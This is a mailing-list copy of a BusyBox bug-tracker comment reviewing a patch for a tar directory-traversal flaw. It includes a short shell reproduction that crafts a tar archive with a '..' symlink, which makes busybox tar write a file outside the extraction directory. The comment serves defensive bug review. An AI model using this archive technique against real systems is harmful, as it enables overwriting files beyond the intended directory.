[Bug 8411] Directory traversal via crafted tar file which contains a symlink pointing outside of the current directory

bugzilla at busybox.net bugzilla at busybox.net
Sat Nov 7 06:06:26 UTC 2015


https://bugs.busybox.net/show_bug.cgi?id=8411

--- Comment #5 from Tyler Hicks <tyhicks at canonical.com> 2015-11-07 06:06:25 UTC ---
(In reply to comment #4)
> Created attachment 6201 [details]
> Patch for busybox 1.22.0 v3
> 
> Matching code style.

Hello Chris - the dot dot check is incorrect. A file can still be extracted
into the parent directory:

$ ln -s .. foo
$ tar -cf dotdot.tar foo
$ rm foo
$ mkdir foo
$ touch foo/bar
$ tar -rf dotdot.tar foo/bar
$ rm -rf foo
$ stat -t ../bar
stat: cannot stat ‘../bar’: No such file or directory
$ busybox tar -xvf dotdot.tar
foo
foo/bar
$ stat -t ../bar
../bar 0 0 81b4 1000 1000 fc00 23736439 1 0 0 1446875494 1446875494 1446876258
0 4096

-- 
Configure bugmail: https://bugs.busybox.net/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.


More information about the busybox-cvs mailing list